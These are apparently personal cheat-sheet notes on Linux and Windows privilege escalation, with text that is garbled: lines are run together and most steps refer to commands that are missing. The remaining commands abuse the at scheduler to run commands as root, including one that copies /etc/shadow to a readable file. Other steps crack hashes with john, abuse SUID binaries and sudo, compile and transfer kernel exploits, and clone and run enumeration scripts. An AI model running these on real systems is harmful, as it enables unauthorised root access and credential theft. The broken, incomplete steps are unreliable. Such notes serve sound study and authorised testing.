nanohash.txtjohnhash.txt# for the already cracked hashesjohn--showhash.txt
check weather the /etc/password and /etc/shadow are having write permissions
-To find the suid files
if the linux machine is having nmap installed in suid file then we can use it to escalate the privileges
In kali machine run a netcat listener
GTFOBINS is helpful to find the suid files and how to use them to escalate the privileges Gtfobins link: https://gtfobins.github.io/
if there is any error while connecting to the target machine try this tweek
This box will opens now select Hardining then enable SSH CLIENT then click on Apply button
if you are able to see the ALL in the sudo -l then you can run any command with sudo
if you are able to see the ALL in the sudo -i
if you see the at try this
Application Vulnerabilities
To list all the packages installed in the linux machine
If you don't have proper shell then try this command if it having python or bash or sh
where is will help you to find the location of the file or command in the linux machine
If you want to share a file from kali to linux or any other manchine(windows/linux) then you can start python Http Server
If you want to download a file from the kali linux to any other machine then you can use wget or curl
If you see Screen-4.5.0 installed in the linux machine then try to search in google or in metasploitable for vulnerabilities or exploits available for that version
if you found any exploit available for screen-4.5.0 then you can use that to escalate the privileges
copy the exploit to the target machine and then give the permissions to execute
For Kernel Vulnerabilities
Use uname -a to see the kernel version. then you can search in google or in metasploit for the kernel version vulnerabilities.
if you use exploits from searchsploit like 5092.c then you need to compile it first then transfer it to the target machine and then execute it
Note: if it asks for the new line need to be added for the file when you compile it then you can use the following command
Automation Tools for Enumeration
LinPEAS: A script that automates the process of privilege escalation enumeration on Linux systems.
LinEnum: A script that automates the process of privilege escalation enumeration on Linux systems.
For Windows we have WinPEAS you need to download it from the official repository then try to run it from powershell
COMMAND="id > hi.txt"
echo "$COMMAND" | at now
cat hi.txt
COMMAND="cat /etc/shadow > hi.txt"
echo "$COMMAND" | at now
cat hi.txt
or you can try bellow command
echo "whoami > hi.txt" | at now
cat hi.txt
apt list --installed
dpkg --list
dpkg -l
dpkg -l | grep -v '^ii lib'
apt list --installed | grep -v '^lib'
ls /usr/share/applications/
git clone https://github.com/carlospolop/PEAS.git
cd PEAS
chmod +x linpeas.sh
./linpeas.sh
# or you can use the following command to run it
./linpeas.sh | tee linpeas_output.txt
# or you can use the following command to run it in the background
./linpeas.sh > linpeas_output.txt 2>&1 &
git clone https://github.com/rebootuser/LinEnum.git
cd LinEnum
chmod +x linenum.sh
./linenum.sh
# or you can use the following command to run it
./linenum.sh | tee linenum_output.txt
# or you can use the following command to run it in the background
./linenum.sh > linenum_output.txt 2>&1 &
git clone https://github.com/carlospolop/PEAS.git
cd PEAS
chmod +x winpeas.bat
./winpeas.bat
# or you can use the following command to run it in the background
./winpeas.bat > winpeas_output.txt 2>&1 &
